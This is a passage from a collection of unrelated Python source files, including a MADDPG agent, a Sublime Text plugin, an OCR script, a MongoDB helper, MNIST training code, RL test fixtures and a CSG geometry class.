torch.load(f'models/checkpoint_actor_{agent_number}.pth', map_location=torch.device('cpu')) self.actor_local.load_state_dict(checkpoint) checkpoint = torch.load(f'models/checkpoint_critic_{agent_number}.pth', map_location=torch.device('cpu')) self.critic_local.load_state_dict(checkpoint) def act(self, state, noise = 0., train = False): """Returns actions for given state as per current policy. :param state: state as seen from single agent """ if train is True: self.actor_local.train() else: self.actor_local.eval() action = self.actor_local(state) if noise > 0: noise = torch.tensor(noise*self.noise.sample(), dtype=state.dtype, device=state.device) return action + noise def target_act(self, state, noise = 0.): #self.actor_target.eval() # convert to cpu() since noise is in cpu() self.actor_target.eval() action = self.actor_target(state).cpu() if noise > 0.: noise = torch.tensor(noise*self.noise.sample(), dtype=state.dtype, device=state.device) return action + noise def update_critic(self, rewards, dones, all_states, all_actions, all_next_states, all_next_actions): with torch.no_grad(): Q_targets_next = self.critic_target(all_next_states, all_next_actions) # Compute Q targets for current states (y_i) q_targets = rewards + (self.gamma * Q_targets_next * (1 - dones)) # Compute critic loss q_expected = self.critic_local(all_states, all_actions) # critic_loss = F.mse_loss(q_expected, q_targets) critic_loss = ((q_expected - q_targets.detach()) ** 2).mean() self.critic_optimizer.zero_grad() critic_loss.backward() self.critic_optimizer.step() def update_actor(self, all_states, all_predicted_actions): """Update actor network :param all_states: all states :param all_predicted_actions: all predicted actions """ actor_loss = -self.critic_local(all_states, all_predicted_actions).mean() self.actor_optimizer.zero_grad() actor_loss.backward(retain_graph=True) self.actor_optimizer.step() def update_targets(self): self.soft_update(self.actor_local, self.actor_target, self.tau) self.soft_update(self.critic_local, self.critic_target, self.tau) def soft_update(self, local_model, target_model, tau): """Soft update model parameters. θ_target = τ*θ_local + (1 - τ)*θ_target Params ====== local_model: PyTorch model (weights will be copied from) target_model: PyTorch model (weights will be copied to) tau (float): interpolation parameter """ for target_param, local_param in zip(target_model.parameters(), local_model.parameters()): target_param.data.copy_(tau * local_param.data + (1.0 - tau) * target_param.data) def reset(self): self.noise.reset()
python
from __future__ import print_function from sublime import Region, load_settings from sublime_plugin import TextCommand from collections import Iterable DEBUG = False def dbg(*msg): if DEBUG: print(' '.join(map(str, msg))) class MyCommand(TextCommand): def set_cursor_to(self, pos): """ Sets the cursor to a given position. If multiple positions are given, a multicursor will be made. """ dbg('setting cursor to {0}'.format(pos)) if not isinstance(pos, Iterable): pos = [pos] self.view.sel().clear() for p in pos: self.view.sel().add(Region(p, p)) def set_selection_to(self, start, end): dbg("setting selection to {0}".format((start, end))) self.view.sel().clear() self.view.sel().add(Region(start, end)) def get_char_at(self, pos): """ Return the character at a position """ return self.view.substr(Region(pos, pos + 1)) def get_current_line(self): """ Return the line at the current cursor """ return self.get_line_at(self.get_cursor()) def get_line_at(self, region): """ Returns the :class:`sublime.Line` at a :class:`sublime.Region` """ return self.view.line(region) def get_cursor(self): """ Returns the first current cursor """ return self.view.sel()[0] class MoveByParagraphCommand(MyCommand): def run(self, edit, extend=False, forward=False, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): """ The cursor will move to beginning of a non-empty line that succeeds an empty one. Selection is supported when "extend" is True. """ if not stop_at_paragraph_begin and not stop_at_paragraph_end: print('[WARNING] MoveByParagraph: stop_at_paragraph_begin and ' 'stop_at_paragraph_end are both False, nothing will happen') return cursor = self.get_cursor() if cursor.a < cursor.b: start = cursor.end() else: start = cursor.begin() kwargs = dict(ignore_blank_lines=ignore_blank_lines, stop_at_paragraph_begin=stop_at_paragraph_begin, stop_at_paragraph_end=stop_at_paragraph_end) dbg('Starting from', cursor) if forward: next_cursor = self._find_paragraph_position_forward(start, **kwargs) else: next_cursor = self._find_paragraph_position_backward(start, **kwargs) dbg('Stopping at', next_cursor) if extend: dbg('set_selection_to', cursor.a, next_cursor.begin()) self.set_selection_to(cursor.a, next_cursor.begin()) else: dbg('set_cursor_to', next_cursor.begin()) self.set_cursor_to(next_cursor.begin()) cursor = self.get_cursor() self.view.show(cursor) def _find_paragraph_position_forward(self, start, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): size = self.view.size() r = Region(start, size) # Obtain the lines that intersect the region lines = self.view.lines(r) for n, line in enumerate(lines[:-1]): if (stop_at_paragraph_begin and self._line_begins_paragraph(lines[n+1], line, ignore_blank_lines)): return Region(lines[n+1].a, lines[n+1].a) if (line.b != start and stop_at_paragraph_end and self._line_ends_paragraph(line, lines[n+1], ignore_blank_lines)): return Region(line.b, line.b) # Check if the last line is empty or not # If it is empty, make sure we jump to the end of the file # If it is not empty, jump to the end of the line if self._substr(lines[-1], ignore_blank_lines) == '': return Region(size, size) end = lines[-1].b # If the file ends with a single newline, it will be stuck # before this newline character unless we do this if end == start: return Region(end+1, end+1) return Region(end, end) def _find_paragraph_position_backward(self, start, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): r = Region(0, start) # Obtain the lines that intersect the region lines = self.view.lines(r) lines.reverse() for n, line in enumerate(lines[:-1]): if (stop_at_paragraph_begin and self._line_begins_paragraph(line, lines[n+1], ignore_blank_lines)): return Region(line.a, line.a) if (stop_at_paragraph_end and self._line_ends_paragraph(lines[n+1], line, ignore_blank_lines)): return Region(lines[n+1].b, lines[n+1].b) return lines[-1] def _line_begins_paragraph(self, line, line_above, ignore_blank_lines): a = self._substr(line, ignore_blank_lines) b = self._substr(line_above, ignore_blank_lines) dbg('line_above', line_above, self.view.substr(line_above)) dbg('line', line, self.view.substr(line)) return a and not b def _line_ends_paragraph(self, line, line_below, ignore_blank_lines): a = self._substr(line, ignore_blank_lines) dbg('line', line, self.view.substr(line)) dbg('line_below', line_below, self.view.substr(line_below)) b = self._substr(line_below, ignore_blank_lines) return a and not b def _substr(self, line, ignore_blank_lines): s = self.view.substr(line) if ignore_blank_lines: return s.strip() return s
python
import sys sys.path.append('C:\Python27\Lib\site-packages') import cv2 import numpy as np import os import pytesseract from PIL import Image from ConnectedAnalysis import ConnectedAnalysis import post_process as pp input_folder = r"C:\Users\SRIDHAR\Documents\python\final\seg_new"; output_folder= "temp"; def postProcess(str): #processess plate string res="" for ind in range(len(str)): ch = str[ind] if ((ch>='A' and ch<= 'Z') or (ch>='0' and ch<='9')): res+=ch if (ind>0 and str[ind-1]=='\\' and str[ind]=='n'): continue return res i=1 ini_res = [] for filename in os.listdir(input_folder): # print "alkfa" img = cv2.imread(os.path.join(input_folder,filename)); #44 #165 outName=os.path.join(output_folder,filename); thresh_image=img; finalstr = "" finalstr= pytesseract.image_to_string(Image.fromarray(cv2.bitwise_not(img))); finalstr = postProcess(finalstr) temp = "" for ind in range(len(filename)): if ind<len(filename)-4: temp += filename[ind] ini_res.append([int(temp),finalstr]) print (temp+" "+finalstr); i = i+1 #print(i) pp.result(ini_res)
python
from pymongo import MongoClient import os class Mongo: def __init__(self): self.__client = MongoClient(os.environ['MONGODB_CONNECTIONSTRING']) self.__db = self.__client.WebScrapingStocks def insert_quotes(self, quotes): dict_quotes = [] for quote in quotes: dict_quotes.append(quote.__dict__) self.__db.quotes.insert_many(dict_quotes) def get_quotes(self): return self.__db.quotes.find() def update_quote(self, quote): query = { "codigo": quote.codigo, "date": quote.date } new_value = {"$set": {"value" : quote.value}} self.__db.quotes.update_one(query, new_value)
python
class DubboError(RuntimeError): def __init__(self, status, msg): self.status = status self.message = msg
python
test_issue_data = """ #### Advanced Settings Modified? (Yes or No) ## What is your overall Commons Configuration strategy? {overall_strategy} ### [FORK MY PROPOSAL]() (link) # Module 1: Token Freeze and Token Thaw - **Token Freeze** is set to **{token_freeze_period} weeks**, meaning that 100% of TEC tokens minted for Hatchers will remain locked from being sold or transferred for {token_freeze_period} weeks. - **Token Thaw** is set to **{token_thaw_period} weeks**, meaning that from the end of Token Freeze, over the course of {token_thaw_period} weeks tokens minted for Hatchers gradually become liquid. At the end of {token_thaw_period} weeks 100% of the Hatchers' TEC tokens have become liquid. - The **Opening Price** is set to **{opening_price} wxDAI**, meaning at the outset of the Commons Upgrade the price to buy TEC on the Augmented Bonding Curve will be {opening_price} wxDAI. ### Strategy: {token_lockup_strategy} ### Data: ![](https://i.imgur.com/Wk3jgGo.jpg) | # of Weeks | % of Tokens Released | Price Floor of Token | | ---------------------------- | --------------------- | ---------------------- | | {token_lockup_week[0]} weeks | {tokens_released[0]}% | {price_floor[0]} wxDAI | | {token_lockup_week[1]} weeks | {tokens_released[1]}% | {price_floor[1]} wxDAI | | {token_lockup_week[2]} weeks | {tokens_released[2]}% | {price_floor[2]} wxDAI | | {token_lockup_week[3]} weeks | {tokens_released[3]}% | {price_floor[3]} wxDAI | | {token_lockup_week[4]} weeks | {tokens_released[4]}% | {price_floor[4]} wxDAI | | {token_lockup_week[5]} weeks | {tokens_released[5]}% | {price_floor[5]} wxDAI | # Module 2: Augmented Bonding Curve (ABC) - **Commons Tribute** is set to **{commons_tribute}%**, which means that {commons_tribute}% of the Hatch funds will go to the Common Pool and {commons_tribute_remainder}% will go to the Reserve Balance. - **Entry Tribute** is set to **{entry_tribute}%** meaning that from every **BUY** order on the ABC, {entry_tribute}% of the order value in wxDAI is subtracted and sent to the Common Pool. - **Exit Tribute** is set to **{exit_tribute}%** meaning that from every **SELL** order on the ABC, {exit_tribute}% of the order value in wxDAI is subtracted and sent to the Common Pool. ### Strategy: {abc_strategy} ### Data: >We're very bullish on TEC so we only provide the BUY scenario as the standard 3 steps that are used to compare different proposals ![](https://i.imgur.com/44MoI7N.png) | Step # | Current Price | Amount In | Tribute Collected | Amount Out | New Price | Price Slippage | | ------------------ | ------------------ | -------------- | ---------------------- | --------------- | -------------- | ------------------- | | **Step {step[0]}** | {current_price[0]} | {amount_in[0]} | {tribute_collected[0]} | {amount_out[0]} | {new_price[0]} | {price_slippage[0]} | | **Step {step[1]}** | {current_price[1]} | {amount_in[1]} | {tribute_collected[1]} | {amount_out[1]} | {new_price[1]} | {price_slippage[1]} | | **Step {step[2]}** | {current_price[2]} | {amount_in[2]} | {tribute_collected[2]} | {amount_out[2]} | {new_price[1]} | {price_slippage[2]} | # Module 3: Tao Voting - **Support Required** is set to **{support_required}%**, which means {support_required}% of all votes must be in favour of a proposal for it to pass. - **Minimum Quorum** is set to **{minimum_quorum}%**, meaning that {minimum_quorum}% of all tokens need to have voted on a proposal in order for it to become valid. - **Vote Duration** is **{vote_duration_days} day(s)**, meaning that eligible voters will have {vote_duration_days} day(s) to vote on a proposal. - **Delegated Voting Period** is set for **{delegated_voting_days} day(s)**, meaning that Delegates will have {delegated_voting_days} day(s) to use their delegated voting power to vote on a proposal. - **Quiet Ending Period** is set to **{quiet_ending_days} day(s)**, this means that {quiet_ending_days} day(s) before the end of the Vote Duration, if the vote outcome changes, the Quiet Ending Extension will be triggered. - **Quiet Ending Extension** is set to **{quiet_ending_extension_days} day(s)**, meaning that if the vote outcome changes during the Quiet Ending Period, an additional {quiet_ending_extension_days} day(s) will be added for voting. - **Execution Delay** is set to **{execution_delay_days} days(s)**, meaning that there is an {execution_delay_days} day delay after the vote is passed before the proposed action is executed. ### Strategy: {tao_voting_strategy} ### Data: ![](https://i.imgur.com/UE0J1sR.png) |# of Quiet Ending Extensions | No Extensions | With 1 Extension | With 2 Extensions | | ------------------------------------------- | ------------------------- | ------------------------------------- | -------------------------------------- | | **Total Amount of Time to Complete a Vote** | {vote_duration_days} days | {vote_duration_days_1_extension} days | {vote_duration_days_2_extensions} days | # Module 4: Conviction Voting Strategy - **Conviction Growth** is set to **{conviction_growth_days} day(s)**, meaning that Conviction will increase by 50% every {conviction_growth_days} day(s). - **Minimum Conviction** is set to **{minimum_conviction}%**, this means that to pass a funding request for an infinitely small amount will still take a minimum of {minimum_conviction}% of the total TEC currently active in the Conviction Voting application. - The **Spending Limit** is set to **{relative_spending_limit}%**, which means that no more than {relative_spending_limit}% of the total funds in the Common Pool can be requested by a single proposal. ### Strategy: {conviction_voting_strategy} ### Data: ![](https://i.imgur.com/9RK5Hom.png) | Variables | Scenario 1 | Scenario 2 | Scenario 3 | Scenario 4 | Scenario 5 | Scenario 6 | | -------------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- | | **Effective Supply** | {effective_supply[0]} | {effective_supply[1]} | {effective_supply[2]} | {effective_supply[3]} | {effective_supply[4]} | {effective_supply[5]} | | **Requested Amount (wxDAI)** | **{requested_amount[0]}** | **{requested_amount[1]}** | **{requested_amount[2]}** | **{requested_amount[3]}** | **{requested_amount[4]}** | **{requested_amount[5]}** | | Amount in Common Pool (wxDAI) | {amount_common_pool[0]} | {amount_common_pool[1]} | {amount_common_pool[2]} | {amount_common_pool[3]} | {amount_common_pool[4]} | {amount_common_pool[5]} | | Minimum Tokens Needed to Pass | {min_tokens_pass[0]} | {min_tokens_pass[1]} | {min_tokens_pass[2]} | {min_tokens_pass[3]} | {min_tokens_pass[4]} | {min_tokens_pass[5]} | | Tokens Needed To Pass in 2 weeks | {tokens_pass_2_weeks[0]} | {tokens_pass_2_weeks[1]} | {tokens_pass_2_weeks[2]} | {tokens_pass_2_weeks[3]} | {tokens_pass_2_weeks[4]} | {tokens_pass_2_weeks[5]} | ------ ### [FORK MY PROPOSAL]() (link) # Summary ### Module 1: Token Freeze & Token Thaw | Parameter | Value | | ------------- | --------------------------- | | Token Freeze | {token_freeze_period} Weeks | | Token Thaw | {token_thaw_period} Weeks | | Opening Price | {opening_price} wxDAI | ### Module 2: Augmented Bonding Curve | Parameter | Value | | ---------------- | ------------------ | | Commons Tribute | {commons_tribute}% | | Entry Tribute | {entry_tribute}% | | Exit Tribute | {commons_tribute}% | | *_Reserve Ratio_ | {reserve_ratio}% | *Reserve Ratio is an output derived from the Opening Price and Commons Tribute. [Learn more about the Reserve Ratio here](https://forum.tecommons.org/t/augmented-bonding-curve-opening-price-reserve-ratio/516). ### Module 3: Disputable Voting | Parameters | Value | | ----------------------- | ------------------------------------ | | Support Required | {support_required}% | | Minimum Quorum | {minimum_quorum}% | | Vote Duration | {vote_duration_days} days(s) | | Delegated Voting Period | {delegated_voting_days} day(s) | | Quiet Ending Period | {quiet_ending_days} day(s) | | Quiet Ending Extension | {quiet_ending_extension_days} day(s) | | Execution Delay | {execution_delay_days} hour(s) | ### Module 4: Conviction Voting | Parameter | Value | | ------------------ | ------------------------------- | | Conviction Growth | {conviction_growth_days} day(s) | | Minimum Conviction | {minimum_conviction}% | | Spending Limit | {relative_spending_limit}% | ### *Advanced Settings >This will be empty or non-existant if the user did not change any advanced settings from their default. Any settings changed from default will show up here | Parameter | Value | | ----------------------- | --------------------------- | | Minmum Effective Supply | {minimum_effective_supply}% | | Hatchers Rage Quit | {hatchers_rage_quit}% | | Virtual Balance | {virtual_balance} wxDAI | [*Learn more about Advanced Settings on the TEC forum](https://forum.tecommons.org/c/defi-legos-and-how-they-work-together/adv-ccd-params/27) ### [FORK MY PROPOSAL]() (link) """
python
import unittest from rooms.room import Room from rooms.position import Position from rooms.vector import build_vector from rooms.actor import Actor from rooms.vision import Vision from rooms.geography.basic_geography import BasicGeography class SimpleVisionTest(unittest.TestCase): def setUp(self): self.room = Room("game1", "map1.room1", None) self.room.coords(0, 0, 100, 100) self.vision = Vision(self.room) self.room.vision = self.vision self.room.geography = BasicGeography() self.actor1 = Actor(self.room, None, None, actor_id="actor1") self.actor1.position = Position(1, 1) self.actor1.move_to(Position(5, 5)) self.actor2 = Actor(self.room, None, None, actor_id="actor2") self.actor2.position = Position(1, 1) self.actor2.move_to(Position(5, 5)) def testPropagateMessages(self): self.room.put_actor(self.actor1) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor1.state.something = "else" command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor1.visible = False command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) def testRemoveActor(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.room._remove_actor(self.actor2) command = queue.get_nowait() self.assertEquals("remove_actor", command['command']) self.assertTrue(queue.empty()) def testActorInvisible(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor2.visible = False command = queue.get_nowait() self.assertEquals("remove_actor", command['command']) self.assertTrue(queue.empty()) def testMultiLayeredDockingVisibility(self): # test if a is docked with b is docked with c that: # c is visible to all # b is invisible to all, but visible to a # a is invisible to all, but visible to a pass def testSendActorEvent(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue1 = self.room.vision.connect_vision_queue(self.actor1.actor_id) queue2 = self.room.vision.connect_vision_queue(self.actor2.actor_id) # clear out sync events queue1.queue.clear() queue2.queue.clear() self.actor1.send_message({'type': 'random'}) self.assertEquals( {'command': 'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'random'}}, queue1.get_nowait()) self.assertEquals( {'command': 'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'random'}}, queue2.get_nowait()) # invisible actors tell no tales self.actor1.visible = False # clear out invisible events queue1.queue.clear() queue2.queue.clear() self.actor1.send_message({'type': 'second'}) self.assertEquals( {'command': 'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'second'}}, queue1.get_nowait()) self.assertTrue(queue2.empty()) # also docked actors # also admin queues def testSendRoomEvent(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue1 = self.room.vision.connect_vision_queue(self.actor1.actor_id) queue2 = self.room.vision.connect_vision_queue(self.actor2.actor_id) # clear out sync events queue1.queue.clear() queue2.queue.clear() self.room.send_message('test', Position(0, 0), {'type': 'random'}) self.assertEquals( {'command': 'message', 'data': {'type': 'random'}, 'message_type': 'test', 'position': {u'x': 0.0, u'y': 0.0, u'z': 0.0}}, queue1.get_nowait()) self.assertEquals( {'command': 'message', 'data': {'type': 'random'}, 'message_type': 'test', 'position': {u'x': 0.0, u'y': 0.0, u'z': 0.0}}, queue2.get_nowait()) # also admin queues
python
# coding: utf-8 import sys, os sys.path.append(os.pardir) import numpy as np from common.layers import * from common.gradient import numerical_gradient from collections import OrderedDict from dataset.mnist import load_mnist class SGD: def __init__(self, lr=0.01): self.lr = lr def update(self, params, grads): for key in params.keys(): params[key] -= self.lr * grads[key] class TwoLayerNet(): def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01): self.params = {} self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size) self.params['b1'] = weight_init_std * np.zeros(hidden_size) self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size) self.params['b2'] = weight_init_std * np.zeros(output_size) self.layers = OrderedDict() self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1']) self.layers['Relu1'] = Relu() self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2']) self.lastLayer = SoftmaxWithLoss() def predict(self, x): for layer in self.layers.values(): x = layer.forward(x) return x def loss(self, x, t): y = self.predict(x) return self.lastLayer.forward(y, t) def accuracy(self, x, t): y = self.predict(x) y = np.argmax(y, axis=1) if t.ndim != 1 : t = np.argmax(t, axis=1) accuracy = np.sum(y == t) / float(x.shape[0]) return accuracy def numerical_gradient(self, x, t): loss_W = lambda W: self.loss(x, t) grads = {} grads['W1'] = numerical_gradient(loss_W, self.params['W1']) grads['b1'] = numerical_gradient(loss_W, self.params['b1']) grads['W2'] = numerical_gradient(loss_W, self.params['W2']) grads['b2'] = numerical_gradient(loss_W, self.params['b2']) return grads def gradient(self, x, t): # forward self.loss(x, t) # backward dout = 1 dout = self.lastLayer.backward(dout) layers = list(self.layers.values()) layers.reverse() for layer in layers: dout = layer.backward(dout) grads = {} grads['W1'] = self.layers['Affine1'].dW grads['b1'] = self.layers['Affine1'].db grads['W2'] = self.layers['Affine2'].dW grads['b2'] = self.layers['Affine2'].db return grads def gradient_check(): (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True) network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10) x_batch = x_train[:3] t_batch = t_train[:3] grad_numerical = network.numerical_gradient(x_batch, t_batch) grad_backprop = network.gradient(x_batch, t_batch) for key in grad_numerical.keys(): diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key])) print(key + ':' + str(diff)) def train_network(): (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True) network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10) optimizer = SGD() iters_num = 10000 batch_size = 100 train_size = x_train.shape[0] iter_per_epoch = max(train_size / batch_size, 1) for i in range(iters_num): batch_mask = np.random.choice(train_size, batch_size) x_batch = x_train[batch_mask] t_batch = t_train[batch_mask] grads = network.gradient(x_batch, t_batch) optimizer.update(network.params, grads) if i % iter_per_epoch == 0: loss = network.loss(x_batch, t_batch) train_acc = network.accuracy(x_train, t_train) test_acc = network.accuracy(x_test, t_test) print('-----------------') print('loss : ' + str(loss)) print('train accuracy : ' + str(train_acc)) print('test accuracy : ' + str(test_acc)) if __name__ == '__main__': # gradient_check() train_network()
python
# Generated by Django 3.0.7 on 2020-08-04 09:56 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('contr_clienti', '0010_contractscan_actaditional'), ] operations = [ migrations.AlterField( model_name='contractscan', name='contract', field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='contr_clienti.Contract'), ), ]
python
#!/usr/bin/python import requests, json, fire, os slack_webhook_url = os.environ['XKCD_SLACK_WEBHOOK_URL'] slack_headers={'Content-Type': 'application/json'} def slack_post(content): _slack_post = requests.post(slack_webhook_url, data=json.dumps(content), headers=slack_headers) return(_slack_post.text) def slack_content_build(title, image, alt): _output = {"text": "*{0}*\n{1}\n{2}".format(title,alt,image)} return(_output) # class named Get for cli usability class Get(object): def comic_current(self): _current_comic = requests.get("https://xkcd.com/info.0.json").json() _title = _current_comic["title"] _alt = _current_comic["alt"] _image = _current_comic["img"] _content = slack_content_build(_title, _image, _alt) slack_post(_content) def comic_by_id(self, comic_id): _comic = requests.get("https://xkcd.com/{0}/info.0.json".format(comic_id)).json() _title = _comic["title"] _alt = _comic["alt"] _image = _comic["img"] _content = slack_content_build(_title, _image, _alt) slack_post(_content) class Pipeline(object): def __init__(self): self.get = Get() if __name__ == '__main__': fire.Fire(Pipeline)
python
import pytest import torch from nnrl.nn.actor import ( Alpha, DeterministicPolicy, MLPContinuousPolicy, MLPDeterministicPolicy, ) from nnrl.nn.critic import ActionValueCritic, MLPVValue from nnrl.nn.model import EnsembleSpec, build_ensemble, build_single from ray.rllib import SampleBatch from raylab.utils.debug import fake_batch @pytest.fixture(scope="module") def reward_fn(): def func(obs, act, new_obs): return new_obs[..., 0] - obs[..., 0] - act.norm(dim=-1) return func @pytest.fixture(scope="module") def termination_fn(): def func(obs, *_): return torch.randn_like(obs[..., 0]) > 0 return func @pytest.fixture def batch(obs_space, action_space): samples = fake_batch(obs_space, action_space, batch_size=256) return {k: torch.from_numpy(v) for k, v in samples.items()} @pytest.fixture def obs(batch): return batch[SampleBatch.CUR_OBS] @pytest.fixture def rew(batch): return batch[SampleBatch.REWARDS] @pytest.fixture def done(batch): return batch[SampleBatch.DONES] @pytest.fixture def new_obs(batch): return batch[SampleBatch.NEXT_OBS] @pytest.fixture def model_spec(): spec = EnsembleSpec() spec.network.units = (32,) spec.network.input_dependent_scale = True spec.residual = True return spec @pytest.fixture def model(obs_space, action_space, model_spec): return build_single(obs_space, action_space, model_spec) @pytest.fixture(params=(1, 2, 4), ids=(f"Models({n})" for n in (1, 2, 4))) def models(request, obs_space, action_space, model_spec): spec = model_spec spec.ensemble_size = request.param spec.parallelize = True return build_ensemble(obs_space, action_space, spec) @pytest.fixture(params=(1, 2), ids=(f"Critics({n})" for n in (1, 2))) def action_critics(request, obs_space, action_space): config = { "encoder": {"units": [32]}, "double_q": request.param == 2, "parallelize": False, } spec = ActionValueCritic.spec_cls.from_dict(config) act_critic = ActionValueCritic(obs_space, action_space, spec) return act_critic.q_values, act_critic.target_q_values @pytest.fixture def state_critics(obs_space): spec = MLPVValue.spec_cls() spec.units = (32,) spec.activation = "ReLU" spec.layer_norm = False main, target = MLPVValue(obs_space, spec), MLPVValue(obs_space, spec) return main, target @pytest.fixture def deterministic_policies(obs_space, action_space): spec = MLPDeterministicPolicy.spec_cls( units=(32,), activation="ReLU", norm_beta=1.2 ) policy = MLPDeterministicPolicy(obs_space, action_space, spec) target_policy = DeterministicPolicy.add_gaussian_noise(policy, noise_stddev=0.3) return policy, target_policy @pytest.fixture(params=(True, False), ids=(f"PiScaleDep({b})" for b in (True, False))) def policy_input_scale(request): return request.param @pytest.fixture def stochastic_policy(obs_space, action_space, policy_input_scale): config = {"encoder": {"units": (32,)}} mlp_spec = MLPContinuousPolicy.spec_cls.from_dict(config) return MLPContinuousPolicy( obs_space, action_space, mlp_spec, input_dependent_scale=policy_input_scale ) @pytest.fixture def alpha_module(): return Alpha(1.0)
python
_base_ = './fcn_r50-d8_512x512_20k_voc12aug.py' model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101), decode_head=dict(num_classes=2), auxiliary_head=dict(num_classes=2) ) dataset_type = 'PLDUDataset' # Dataset type, this will be used to define the dataset. data_root = '../data/pldu/' data = dict( samples_per_gpu=2, workers_per_gpu=2, train=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/train', ann_dir='ann_dir/train', split=None, ), val=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/val', ann_dir='ann_dir/val', split=None, ), test=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/val', ann_dir='ann_dir/val', split=None, ) )
python
import sys import os import argparse def make_streams_binary(): sys.stdin = sys.stdin.detach() sys.stdout = sys.stdout.detach() parser = argparse.ArgumentParser(description='generate random data.') parser.add_argument('--octets', metavar='N', dest='octets', type=int, nargs='?', default=2048, help='octetss length (default: 2048)') args = parser.parse_args() octets = args.octets make_streams_binary() random_data = os.urandom(octets) sys.stdout.write(random_data)
python
# pvtrace is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # pvtrace is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from Geometry import Box, Cylinder, Ray, cmp_points, separation from external.transformations import translation_matrix, rotation_matrix import external.transformations as tf import numpy as np def transform_point(point, transform): return np.array(np.dot(transform, np.matrix(np.concatenate((point, [1.]))).transpose()).transpose()[0,0:3]).squeeze() def transform_direction(direction, transform): angle, axis, point = tf.rotation_from_matrix(transform) rotation_transform = tf.rotation_matrix(angle, axis) return np.array(np.dot(rotation_transform, np.matrix(np.concatenate((direction, [1.]))).transpose()).transpose()[0,0:3]).squeeze() class CSGadd(object): """ Constructive Solid Geometry Boolean Addition """ def __init__(self, ADDone, ADDtwo): super(CSGadd, self).__init__() self.ADDone = ADDone self.ADDtwo = ADDtwo self.reference = 'CSGadd' self.transform = tf.identity_matrix() def append_name(self, namestring): """ In case a scene contains several CSG objects, this helps with surface identification (see return value of def surface_identifier(..)) """ self.reference = namestring def append_transform(self, new_transform): self.transform = tf.concatenate_matrices(new_transform, self.transform) self.ADDone.transform = tr.concatenate_matrices(new_transform, self.ADDone.transform) self.ADDtwo.transform = tr.concatenate_matrices(new_transform, self.ADDtwo.transform) def contains(self, point): """ Returns True if ray contained by CSGadd, False otherwise """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.ADDone.contains(local_point) bool2 = self.ADDtwo.contains(local_point) bool3 = self.ADDone.on_surface(local_point) bool4 = self.ADDtwo.on_surface(local_point) if bool1 or bool2: return True if bool3 and bool4: return True return False def intersection(self, ray): """ Returns the intersection points of ray with CSGadd in global frame """ # We will need the invtransform later when we return the results..." invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) ADDone__intersections = self.ADDone.intersection(localray) ADDtwo__intersections = self.ADDtwo.intersection(localray) """ Cover the simpler cases """ if ADDone__intersections == None and ADDtwo__intersections == None: return None """ Change ..._intersections into tuples """ if ADDone__intersections != None: for i in range(0,len(ADDone__intersections)): point = ADDone__intersections[i] new_point = (point[0], point[1], point[2]) ADDone__intersections[i] = new_point if ADDtwo__intersections != None: for i in range(0,len(ADDtwo__intersections)): point = ADDtwo__intersections[i] new_point = (point[0],point[1],point[2]) ADDtwo__intersections[i] = new_point """ Only intersection points NOT containted in resp. other structure relevant """ ADDone_intersections = [] ADDtwo_intersections = [] if ADDone__intersections != None: for i in range(0,len(ADDone__intersections)): if self.ADDtwo.contains(ADDone__intersections[i]) == False: ADDone_intersections.append(ADDone__intersections[i]) if ADDtwo__intersections != None: for j in range(0,len(ADDtwo__intersections)): if self.ADDone.contains(ADDtwo__intersections[j]) == False: ADDtwo_intersections.append(ADDtwo__intersections[j]) """ => Convert to list """ ADDone_set = set(ADDone_intersections[:]) ADDtwo_set = 